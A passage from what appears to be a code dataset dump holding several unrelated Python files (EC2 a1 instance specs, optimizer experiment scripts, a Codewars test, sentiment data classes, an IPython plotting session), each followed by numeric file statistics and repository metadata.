437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 800, 'BaselineThroughputInMBps': 100.0, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 800, 'BaselineThroughputInMBps': 100.0, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1750, 'BaselineThroughputInMBps': 218.75, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1750, 'BaselineThroughputInMBps': 218.75, 'BaselineIops': 10000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.metal', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 3500, 'BaselineThroughputInMBps': 437.5, 'BaselineIops': 20000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}] # noqa: E501
def get_instances_list() -> list:
'''Returns list EC2 instances with InstanceType = a .'''
# pylint: disable=all
return get
| 1,227.416667
| 14,540
| 0.75219
| 1,097
| 14,729
| 10.097539
| 0.113036
| 0.043333
| 0.047666
| 0.052
| 0.97084
| 0.97084
| 0.938973
| 0.938973
| 0.938973
| 0.925973
| 0
| 0.047441
| 0.072646
| 14,729
| 11
| 14,541
| 1,339
| 0.763526
| 0.008555
| 0
| 0
| 1
| 0
| 0.692181
| 0.323169
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 13
|
9cbf3b14921cb332eefbf85aff4f3fe6463232d9
| 5,446
|
py
|
Python
|
Logistic_Regression/run.py
|
htt-trangtran/smg
|
b7a49055e7d48ec456bac67ab473db2183d2f597
|
[
"MIT"
] | 1
|
2021-11-25T05:57:13.000Z
|
2021-11-25T05:57:13.000Z
|
Logistic_Regression/run.py
|
htt-trangtran/smg
|
b7a49055e7d48ec456bac67ab473db2183d2f597
|
[
"MIT"
] | null | null | null |
Logistic_Regression/run.py
|
htt-trangtran/smg
|
b7a49055e7d48ec456bac67ab473db2183d2f597
|
[
"MIT"
] | 1
|
2021-11-25T05:35:21.000Z
|
2021-11-25T05:35:21.000Z
|
############################
# written by Trang H. Tran and Lam M. Nguyen
############################
"""
Run the experiments
"""
import os
import numpy as np
import pandas as pd
from load_data import *
from algorithms import *
from record_history import *
from util_func import *
from schedule_LR import *
from train_data import *
from average_and_plot import *
# Change the record path
record_path = './SMG_record/'
record_avg_path = record_path + 'Avg/'
if not os.path.exists(record_path):
os.makedirs(record_path)
if not os.path.exists(record_avg_path):
os.makedirs(record_avg_path)
# Experiment 1: Comparing SMG with Other Methods -------------------------------
namelr = 'const_'
num_epoch = [200, 10] # Run for 200 epochs, and measure the performance each 10 epochs
# Data: w8a --------------------------------------------------------------------
dataname = 'w8a'
listrecord = []
namealg = '_SMG_'
params = [[0.5, 0.4, 0.2, 0.1, 0.08, 0.06, 0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGD_'
params = [[0.5, 0.4, 0.2], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGDM_'
params = [[0.05, 0.04, 0.02, 0.01, 0.008, 0.006, 0.005], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_ADAM_'
params = [[0.002, 0.001, 0.0005], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Data: ijcnn1 ----------------------------------------------------------------
dataname = 'ijcnn1'
listrecord = []
namealg = '_SMG_'
params = [[0.5, 0.4, 0.2, 0.1, 0.08, 0.06, 0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGD_'
params = [[0.5, 0.4, 0.2], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_SGDM_'
params = [[0.05, 0.04, 0.02, 0.01, 0.008, 0.006, 0.005], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namealg = '_ADAM_'
params = [[0.002, 0.001, 0.0005], [0], [0]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Experiment 2: Comparing hyper-parameters for SMG -----------------------------
namelr = 'const_'
namealg = '_SMG_'
num_epoch = [200, 10]
# Data: w8a --------------------------------------------------------------------
dataname = 'w8a'
listrecord = []
params = [[0.2, 0.1, 0.05], [0], [0.1, 0.2, 0.3, 0.4, 0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Data: ijcnn1 ----------------------------------------------------------------
dataname = 'ijcnn1'
listrecord = []
params = [[0.2, 0.1, 0.05], [0], [0.1, 0.2, 0.3, 0.4, 0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Experiment 3: Comparing learning rate schemes for SMG ------------------------
namealg = '_SMG_'
num_epoch = [200, 10]
# Data: w8a --------------------------------------------------------------------
dataname = 'w8a'
listrecord = []
namelr = 'const_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'cos_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [num_epoch[0]], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'exp_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0.99, 0.995, 0.999], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'dim_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [1, 2, 4, 8], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
# Data: ijcnn1 ----------------------------------------------------------------
dataname = 'ijcnn1'
listrecord = []
namelr = 'const_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'cos_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [num_epoch[0]], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'exp_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [0.99, 0.995, 0.999], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
namelr = 'dim_'
params = [[0.5,0.4,0.2,0.1,0.08,0.06,0.05], [1, 2, 4, 8], [0.5]]
listrecord = train_data (dataname, num_epoch, namealg, namelr, params, listrecord, record_path)
plot_data (dataname, num_epoch, listrecord, record_path, record_avg_path)
| 36.066225
| 96
| 0.604848
| 793
| 5,446
| 3.981084
| 0.119798
| 0.091859
| 0.114032
| 0.152043
| 0.829268
| 0.823567
| 0.808996
| 0.808996
| 0.808996
| 0.808996
| 0
| 0.085653
| 0.148917
| 5,446
| 150
| 97
| 36.306667
| 0.595469
| 0.157547
| 0
| 0.827957
| 0
| 0
| 0.033471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.107527
| 0
| 0.107527
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
142debd67ae9255e7b90de6ef0c907971121d255
| 164
|
py
|
Python
|
Codewars/8kyu/grasshopper-terminal-game-combat-function-1/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/8kyu/grasshopper-terminal-game-combat-function-1/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/8kyu/grasshopper-terminal-game-combat-function-1/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
test.describe('Basic Tests')
test.assert_equals(combat(100, 5), 95)
test.assert_equals(combat(83, 16), 67)
test.assert_equals(combat(20, 30), 0)
| 20.5
| 38
| 0.713415
| 29
| 164
| 3.931034
| 0.655172
| 0.263158
| 0.421053
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136054
| 0.103659
| 164
| 7
| 39
| 23.428571
| 0.639456
| 0.085366
| 0
| 0
| 0
| 0
| 0.074324
| 0
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
146c88161cb654660b455331203bdcb441d81a79
| 3,971
|
py
|
Python
|
asent/data_classes.py
|
EmilStenstrom/asent
|
88a5843770d21dae20da8c09fdbd4991ee8a15c1
|
[
"MIT"
] | 4
|
2021-12-05T13:45:14.000Z
|
2022-02-10T07:17:59.000Z
|
asent/data_classes.py
|
EmilStenstrom/asent
|
88a5843770d21dae20da8c09fdbd4991ee8a15c1
|
[
"MIT"
] | 22
|
2021-12-04T14:31:15.000Z
|
2022-02-02T10:00:03.000Z
|
asent/data_classes.py
|
EmilStenstrom/asent
|
88a5843770d21dae20da8c09fdbd4991ee8a15c1
|
[
"MIT"
] | 3
|
2021-12-06T13:57:45.000Z
|
2022-01-08T17:07:36.000Z
|
from __future__ import annotations
from typing import List, Optional, Union
from pydantic import BaseModel
from spacy.tokens import Span, Token, Doc
class TokenPolarityOutput(BaseModel):
"""A data class for the polarity output of a span,
notably allows for plotting the output"""
class Config:
arbitrary_types_allowed = True
polarity: float
token: Token
span: Span
negation: Optional[Token] = None
intensifiers: List[Token] = []
def __repr_str__(self, join_str: str) -> str:
return join_str.join(
repr(v) if a is None else f"{a}={v!r}"
for a, v in [
("polarity", round(self.polarity, 3)),
("token", self.token),
("span", self.span),
]
)
def __lt__(self, other: Union[TokenPolarityOutput, float]):
if isinstance(other, TokenPolarityOutput):
other = other.polarity
return self.polarity < other
def __gt__(self, other: Union[TokenPolarityOutput, float]):
if isinstance(other, TokenPolarityOutput):
other = other.polarity
return self.polarity > other
def __bool__(self):
return bool(self.polarity)
def __eq__(self, other: Union[TokenPolarityOutput, float]):
if isinstance(other, TokenPolarityOutput):
other = other.polarity
return self.polarity == other
class SpanPolarityOutput(BaseModel):
"""A data class for the polarity output of a span,
notably allows for plotting the output"""
class Config:
arbitrary_types_allowed = True
negative: float
neutral: float
positive: float
compound: float
span: Span
polarities: List[TokenPolarityOutput]
def __repr_str__(self, join_str: str) -> str:
return join_str.join(
repr(v) if a is None else f"{a}={v!r}"
for a, v in [
("neg", round(self.negative, 3)),
("neu", round(self.neutral, 3)),
("pos", round(self.positive, 3)),
("compound", round(self.compound, 4)),
("span", self.span),
]
)
def __lt__(self, other: Union[SpanPolarityOutput, float]):
if isinstance(other, SpanPolarityOutput):
other = other.compound
return self.compound < other
def __gt__(self, other: Union[SpanPolarityOutput, float]):
if isinstance(other, SpanPolarityOutput):
other = other.compound
return self.compound > other
def __eq__(self, other: Union[SpanPolarityOutput, float]) -> bool:
if isinstance(other, SpanPolarityOutput):
other = other.compound
return self.compound == other
class DocPolarityOutput(BaseModel):
"""A data class for the polarity output of a doc"""
class Config:
arbitrary_types_allowed = True
negative: float
neutral: float
positive: float
compound: float
doc: Doc
polarities: List[SpanPolarityOutput]
def __repr_str__(self, join_str: str) -> str:
return join_str.join(
repr(v) if a is None else f"{a}={v!r}"
for a, v in [
("neg", round(self.negative, 3)),
("neu", round(self.neutral, 3)),
("pos", round(self.positive, 3)),
("compound", round(self.compound, 4)),
]
)
def __lt__(self, other: Union[DocPolarityOutput, float]):
if isinstance(other, DocPolarityOutput):
other = other.compound
return self.compound < other
def __gt__(self, other: Union[DocPolarityOutput, float]):
if isinstance(other, DocPolarityOutput):
other = other.compound
return self.compound > other
def __eq__(self, other: Union[DocPolarityOutput, float]) -> bool:
if isinstance(other, DocPolarityOutput):
other = other.compound
return self.compound == other
| 30.312977
| 70
| 0.602115
| 435
| 3,971
| 5.333333
| 0.156322
| 0.034914
| 0.05431
| 0.066379
| 0.819828
| 0.792672
| 0.79181
| 0.79181
| 0.777155
| 0.777155
| 0
| 0.003218
| 0.295643
| 3,971
| 130
| 71
| 30.546154
| 0.826242
| 0.05515
| 0
| 0.632653
| 0
| 0
| 0.021996
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132653
| false
| 0
| 0.040816
| 0.040816
| 0.540816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
146f9c0da58ff4089bb65f473891c9d015d3e46b
| 3,154
|
py
|
Python
|
demos/ipython_virial_plotter.py
|
tcrundall/chronostar
|
bdb5cd965e862ba5cc21bee75d5c8620e106c0cc
|
[
"MIT"
] | null | null | null |
demos/ipython_virial_plotter.py
|
tcrundall/chronostar
|
bdb5cd965e862ba5cc21bee75d5c8620e106c0cc
|
[
"MIT"
] | null | null | null |
demos/ipython_virial_plotter.py
|
tcrundall/chronostar
|
bdb5cd965e862ba5cc21bee75d5c8620e106c0cc
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import virial_plotter as vp
get_ipython().magic(u'cat virial_plotter.py')
MU
vp.MU
vp.SIG
np.exp
import numpy as np
vp.np
np.exp(3)
np.log(3)
np.log(4) - np.log(2)
SIG
vp.SIG
np.log(10) - np.log(1)
vp.lognormal
help(vp.lognormal)
vp.lognormal(1, np.log(1), np.log(10) - np.log(1))
myxs = np.linspace(0,10)
vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1))
myxs = np.linspace(1e-5, 10)
import matplotlib.pyplot as plt
plt.plot(myxs, vp.lognormal(myxs np.log(1), np.log(10) - np.log(1)))
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.show()
plt.clf()
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.show()
plt.clf()
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.savefig("temp_plots/vp.png")
myxs = np.linspace(1e-5, 10, 100)
plt.clf()
plt.plot(myxs, vp.lognormal(myxs, np.log(3), np.log(10) - np.log(1)))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, np.log(3), 0.5))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, np.log(3), 1.))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, 1.05, 0.105))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, 1.05, np.sqrt(0.105)))
plt.savefig("temp_plots/vp.png")
main_mean = np.log(3)
mode = 3
stds = np.linspace(0.2,1.0,5)
stds
stds = np.array([1.,10.,10])
means = stds**2 + np.log(mode)
means
stds = np.linspace([1.,10.,10])
stds = np.linspace(1.,10.,10)
means = stds**2 + np.log(mode)
means
stds = np.linspace(1.,4,10)
means = stds**2 + np.log(mode)
means
plt.clf()
for mn, std in zip(means, stds):
plt.plot(myxs, vp.lognormal(myxs, mn, std))
plt.savefig("temp_plots/vp.png")
for mn, std in zip(means, stds):
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.clf()
for mn, std in zip(means, stds):
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.savefig("temp_plots/vp.png")
stds
stds = np.linspace(0.7, 2,3)
plt.clf()
for std in stds:
mn = std**2 + mode
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.savefig("temp_plots/vp.png")
mode
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.clf()
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.savefig("temp_plots/vp.png")
plt.clf()
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)),
label=r"$\sigma = ${:.2}".format(std))
plt.savefig("temp_plots/vp.png")
plt.legend(loc='best')
plt.savefig("temp_plots/vp.png")
stds = np.array([0.2, 0.7, 1.2, 1.7])
plt.clf()
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)),
label=r"$\sigma = ${:.2}".format(std))
plt.legend(loc='best')
plt.xlabel(r"$\alpha$")
plt.savefig("temp_plots/vp.png")
plt.legend(loc=4)
plt.savefig("temp_plots/vp.png")
| 28.414414
| 83
| 0.653456
| 617
| 3,154
| 3.311183
| 0.110211
| 0.088106
| 0.183554
| 0.108174
| 0.85022
| 0.835047
| 0.796378
| 0.780715
| 0.752325
| 0.706314
| 0
| 0.043179
| 0.126189
| 3,154
| 110
| 84
| 28.672727
| 0.698113
| 0.004122
| 0
| 0.60396
| 0
| 0
| 0.097802
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.029703
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 0
